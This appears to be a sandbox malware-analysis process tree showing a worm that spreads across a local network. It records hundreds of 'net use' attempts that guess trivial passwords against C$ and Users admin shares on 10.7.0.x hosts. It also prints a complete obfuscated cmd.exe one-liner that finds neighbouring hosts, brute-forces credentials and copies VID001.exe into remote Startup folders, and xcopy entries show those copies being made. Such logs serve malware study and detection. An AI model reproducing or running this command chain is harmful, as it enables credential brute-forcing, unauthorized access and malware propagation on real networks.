C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
- Runs ping.exe
PID:3028

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\C$ """" /user:"1"
10⤵
PID:1972

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\Users """" /user:"1"
10⤵
PID:3056

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:2300

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\C$ "1" /user:"1"
10⤵
PID:2144

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\Users "1" /user:"1"
10⤵
PID:1900

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:2360

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\C$ "1" /user:"1"
10⤵
PID:2412

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\Users "1" /user:"1"
10⤵
PID:2212

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:2660

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\C$ "123" /user:"1"
10⤵
PID:2484

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\Users "123" /user:"1"
10⤵
PID:2520

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
- Runs ping.exe
PID:2512

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\C$ "0" /user:"10.7.0.1"
10⤵
PID:2808

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\Users "0" /user:"10.7.0.1"
10⤵
PID:2908

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
- Runs ping.exe
PID:1792

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\C$ """" /user:"10.7.0.1"
10⤵
PID:1064

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\Users """" /user:"10.7.0.1"
10⤵
PID:2184

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:1952

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\C$ "10.7.0.1" /user:"10.7.0.1"
10⤵
PID:2780

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\Users "10.7.0.1" /user:"10.7.0.1"
10⤵
PID:3028

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:1972

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\C$ "1" /user:"10.7.0.1"
10⤵
PID:2300

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\Users "1" /user:"10.7.0.1"
10⤵
PID:432

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:2320

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\C$ "123" /user:"10.7.0.1"
10⤵
PID:1996

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\Users "123" /user:"10.7.0.1"
10⤵
PID:2404

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:300

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\C$ "0" /user:"administrator"
10⤵
PID:940

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\Users "0" /user:"administrator"
10⤵
PID:2204

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:2516

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\C$ """" /user:"administrator"
10⤵
PID:2736

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\Users """" /user:"administrator"
10⤵
PID:2804

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:1696

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\C$ "administrator" /user:"administrator"
10⤵
PID:2740

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /v:on /c (for /f "usebackq tokens=1,*" %i in (`net view^|find /i "\\" ^|^| arp -a^|find /i " 1"`) do set str_!random!=%i)& for /f "usebackq tokens=1* delims==" %j in (`set str_`) do set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=VID001.exe& if not "!s!"=="%COMPUTERNAME%" (for /f "usebackq tokens=1,*" %j in (`net view \\!s!^|find /i " "`) do echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\!s!\%j\VID001.exe") & net use * /delete /y & (for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 "" %u 1 123) do ping -n 3 localhost & (for %c in (\\!s!\C$ \\!s!\Users) do (if not "%p%u"=="01" net use %c "%p" /user:"%u") && ((for %d in ("%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!") do echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" %d) & net use %c /delete /y & ping -n 20 localhost)))
9⤵
PID:2164

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net view|find /i "\\" || arp -a|find /i " 1"
10⤵
PID:2180

C:\Windows\SysWOW64\find.exe
find /i "\\"
11⤵
PID:2176

C:\Windows\SysWOW64\net.exe
net view
11⤵
- Discovers systems in the same network
PID:432

C:\Windows\SysWOW64\find.exe
find /i " 1"
11⤵
PID:2384

C:\Windows\SysWOW64\ARP.EXE
arp -a
11⤵
PID:1900

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c set str_
10⤵
PID:2360

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net view \\10.7.0.1|find /i " "
10⤵
PID:2312

C:\Windows\SysWOW64\find.exe
find /i " "
11⤵
PID:2404

C:\Windows\SysWOW64\net.exe
net view \\10.7.0.1
11⤵
- Discovers systems in the same network
PID:2424

C:\Windows\SysWOW64\net.exe
net use * /delete /y
10⤵
PID:812

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:2072

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.1\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\VID001.exe"
10⤵
PID:2716

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
10⤵
PID:2212

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
10⤵
PID:1572

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.1\C$\Documents and Settings\1\Start Menu\Programs\Startup\VID001.exe"
10⤵
PID:2660

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.1\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VID001.exe"
10⤵
PID:2636

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
10⤵
PID:940

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\C$ /delete /y
10⤵
PID:2708

C:\Windows\SysWOW64\PING.EXE
ping -n 20 localhost
10⤵
- Runs ping.exe
PID:1780

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
10⤵
PID:2184

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.1\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\VID001.exe"
10⤵
PID:2868

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
10⤵
PID:2912

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.1\Users\Documents and Settings\1\Start Menu\Programs\Startup\VID001.exe"
10⤵
PID:3004

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
10⤵
PID:2956

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.1\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VID001.exe"
10⤵
PID:1952

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\Users /delete /y
10⤵
PID:1588

C:\Windows\SysWOW64\PING.EXE
ping -n 20 localhost
10⤵
- Runs ping.exe
PID:2936

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:2340

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\C$ """" /user:"1"
10⤵
PID:2404

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\Users """" /user:"1"
10⤵
PID:2544

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:2672

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\C$ "1" /user:"1"
10⤵
PID:2204

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\Users "1" /user:"1"
10⤵
PID:2188

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
- Runs ping.exe
PID:2580

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\C$ "1" /user:"1"
10⤵
PID:1068

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\Users "1" /user:"1"
10⤵
PID:2792

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:2740

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\C$ "123" /user:"1"
10⤵
PID:2720

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\Users "123" /user:"1"
10⤵
PID:2868

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:2932

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\C$ "0" /user:"10.7.0.1"
10⤵
PID:2852

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\Users "0" /user:"10.7.0.1"
10⤵
PID:1924

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:1764

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\C$ """" /user:"10.7.0.1"
10⤵
PID:3012

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\Users """" /user:"10.7.0.1"
10⤵
PID:2028

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
- Runs ping.exe
PID:2624

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\C$ "10.7.0.1" /user:"10.7.0.1"
10⤵
PID:1800

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\Users "10.7.0.1" /user:"10.7.0.1"
10⤵
PID:2468

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
- Runs ping.exe
PID:2544

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\C$ "1" /user:"10.7.0.1"
10⤵
PID:2724

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\Users "1" /user:"10.7.0.1"
10⤵
PID:2108

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:2592

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\C$ "123" /user:"10.7.0.1"
10⤵
PID:2220

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\Users "123" /user:"10.7.0.1"
10⤵
PID:2796

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:588

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\C$ "0" /user:"administrator"
10⤵
PID:1208

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c taskkill /f /im net.exe & tskill net.exe
9⤵
PID:2116

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im net.exe
10⤵
- Kills process with taskkill
PID:2168

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ "1" /user:"1"
5⤵
PID:1648

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users "1" /user:"1"
5⤵
PID:1632

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:1184

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ "1" /user:"1"
5⤵
PID:1984

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users "1" /user:"1"
5⤵
PID:1892

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:964

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ "123" /user:"1"
5⤵
PID:748

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users "123" /user:"1"
5⤵
PID:1632

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
- Runs ping.exe
PID:1012

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ "0" /user:"10.7.0.13"
5⤵
PID:1616

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users "0" /user:"10.7.0.13"
5⤵
PID:992

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:1104

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ """" /user:"10.7.0.13"
5⤵
PID:2016

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users """" /user:"10.7.0.13"
5⤵
PID:952

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:1948

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ "10.7.0.13" /user:"10.7.0.13"
5⤵
PID:1616

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users "10.7.0.13" /user:"10.7.0.13"
5⤵
PID:2040

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
- Runs ping.exe
PID:2020

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ "1" /user:"10.7.0.13"
5⤵
PID:292

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users "1" /user:"10.7.0.13"
5⤵
PID:616

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:384

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ "123" /user:"10.7.0.13"
5⤵
PID:1108

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users "123" /user:"10.7.0.13"
5⤵
PID:1444

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2020

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ "0" /user:"administrator"
5⤵
PID:1916

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users "0" /user:"administrator"
5⤵
PID:1328

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2004

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ """" /user:"administrator"
5⤵
PID:1940

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users """" /user:"administrator"
5⤵
PID:1948

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:936

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ "administrator" /user:"administrator"
5⤵
PID:952

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users "administrator" /user:"administrator"
5⤵
PID:1104

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:1940

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ "1" /user:"administrator"
5⤵
PID:1328

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users "1" /user:"administrator"
5⤵
PID:2016

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
- Runs ping.exe
PID:1608

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ "123" /user:"administrator"
5⤵
PID:1184

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users "123" /user:"administrator"
5⤵
PID:936

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2012

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ "0" /user:"user"
5⤵
PID:1184

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users "0" /user:"user"
5⤵
PID:936

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:1104

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ """" /user:"user"
5⤵
PID:640

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users """" /user:"user"
5⤵
PID:1956

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2012

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ "user" /user:"user"
5⤵
PID:1384

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users "user" /user:"user"
5⤵
PID:2028

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:1980

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ "1" /user:"user"
5⤵
PID:1976

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users "1" /user:"user"
5⤵
PID:1752

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2016

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ "123" /user:"user"
5⤵
PID:1916

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users "123" /user:"user"
5⤵
PID:1356

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:1980

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ "0" /user:"admin"
5⤵
PID:2028

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users "0" /user:"admin"
5⤵
PID:1752

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
- Runs ping.exe
PID:2016

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ """" /user:"admin"
5⤵
PID:1916

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users """" /user:"admin"
5⤵
- Enumerates system info in registry
PID:1752

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:936

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ "admin" /user:"admin"
5⤵
PID:2028

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users "admin" /user:"admin"
5⤵
PID:1584

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2016

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ "1" /user:"admin"
5⤵
PID:1988

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users "1" /user:"admin"
5⤵
PID:1356

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
- Runs ping.exe
PID:936

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ "123" /user:"admin"
5⤵
PID:1184

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users "123" /user:"admin"
5⤵
PID:1584

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:1916

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ "0" /user:"àäìèíèñòðàòîð"
5⤵
PID:1988

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users "0" /user:"àäìèíèñòðàòîð"
5⤵
PID:1584

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:936

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ """" /user:"àäìèíèñòðàòîð"
5⤵
PID:640

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users """" /user:"àäìèíèñòðàòîð"
5⤵
PID:1356

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:1052

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ "àäìèíèñòðàòîð" /user:"àäìèíèñòðàòîð"
5⤵
PID:1976

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users "àäìèíèñòðàòîð" /user:"àäìèíèñòðàòîð"
5⤵
PID:1988

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:1672

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ "1" /user:"àäìèíèñòðàòîð"
5⤵
PID:1976

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users "1" /user:"àäìèíèñòðàòîð"
5⤵
PID:1108

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
- Runs ping.exe
PID:1684

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ "123" /user:"àäìèíèñòðàòîð"
5⤵
PID:1356

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users "123" /user:"àäìèíèñòðàòîð"
5⤵
PID:1572

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net view \\10.7.0.255|find /i " "
5⤵
PID:1672

C:\Windows\SysWOW64\net.exe
net view \\10.7.0.255
6⤵
- Discovers systems in the same network
PID:1048

C:\Windows\SysWOW64\find.exe
find /i " "
6⤵
PID:1764

C:\Windows\SysWOW64\net.exe
net use * /delete /y
5⤵
PID:1976

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
- Runs ping.exe
PID:2020

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
5⤵
PID:1544

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.255\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\VID001.exe"
5⤵
PID:1976

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
5⤵
PID:1048

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.255\C$\Documents and Settings\1\Start Menu\Programs\Startup\VID001.exe"
5⤵
PID:1496

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
5⤵
PID:1108

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.255\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VID001.exe"
5⤵
PID:1312

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ /delete /y
5⤵
PID:1356

C:\Windows\SysWOW64\PING.EXE
ping -n 20 localhost
5⤵
PID:1048

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
5⤵
PID:2092

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.255\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\VID001.exe"
5⤵
PID:2100

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.255\Users\Documents and Settings\1\Start Menu\Programs\Startup\VID001.exe"
5⤵
PID:2172

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
5⤵
PID:2164

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
5⤵
PID:2180

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.255\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VID001.exe"
5⤵
PID:2188

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users /delete /y
5⤵
PID:2196

C:\Windows\SysWOW64\PING.EXE
ping -n 20 localhost
5⤵
PID:2216

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2320

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ """" /user:"1"
5⤵
PID:2360

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users """" /user:"1"
5⤵
PID:2388

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2408

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ "1" /user:"1"
5⤵
PID:2464

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users "1" /user:"1"
5⤵
PID:2484

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2504

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ "1" /user:"1"
5⤵
PID:2556

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users "1" /user:"1"
5⤵
PID:2580

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
- Runs ping.exe
PID:2600

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ "123" /user:"1"
5⤵
PID:2624

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users "123" /user:"1"
5⤵
PID:2648

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2692

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ "0" /user:"10.7.0.255"
5⤵
PID:2720

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users "0" /user:"10.7.0.255"
5⤵
PID:2748

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2764

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ """" /user:"10.7.0.255"
5⤵
PID:2816

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users """" /user:"10.7.0.255"
5⤵
PID:2836

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
- Runs ping.exe
PID:2856

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ "10.7.0.255" /user:"10.7.0.255"
5⤵
PID:2908

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users "10.7.0.255" /user:"10.7.0.255"
5⤵
PID:2924

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2944

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ "1" /user:"10.7.0.255"
5⤵
PID:2972

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users "1" /user:"10.7.0.255"
5⤵
PID:2992

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:3012

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ "123" /user:"10.7.0.255"
5⤵
PID:3040

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users "123" /user:"10.7.0.255"
5⤵
PID:3060

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2060

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ "0" /user:"administrator"
5⤵
PID:2020

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users "0" /user:"administrator"
5⤵
PID:2108

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2144

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ """" /user:"administrator"
5⤵
PID:2172

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users """" /user:"administrator"
5⤵
PID:2208

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2300

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ "administrator" /user:"administrator"
5⤵
PID:1996

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users "administrator" /user:"administrator"
5⤵
PID:2236

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2332

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ "1" /user:"administrator"
5⤵
PID:2392

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users "1" /user:"administrator"
5⤵
PID:2456

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2428

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ "123" /user:"administrator"
5⤵
PID:2464

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users "123" /user:"administrator"
5⤵
PID:2492

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:300

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ "0" /user:"user"
5⤵
PID:2552

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users "0" /user:"user"
5⤵
PID:2508

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2556

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ """" /user:"user"
5⤵
PID:2616

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users """" /user:"user"
5⤵
PID:2636

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2680

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ "user" /user:"user"
5⤵
PID:1780

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users "user" /user:"user"
5⤵
PID:2704

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2744

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ "1" /user:"user"
5⤵
PID:2760

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users "1" /user:"user"
5⤵
PID:2804

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
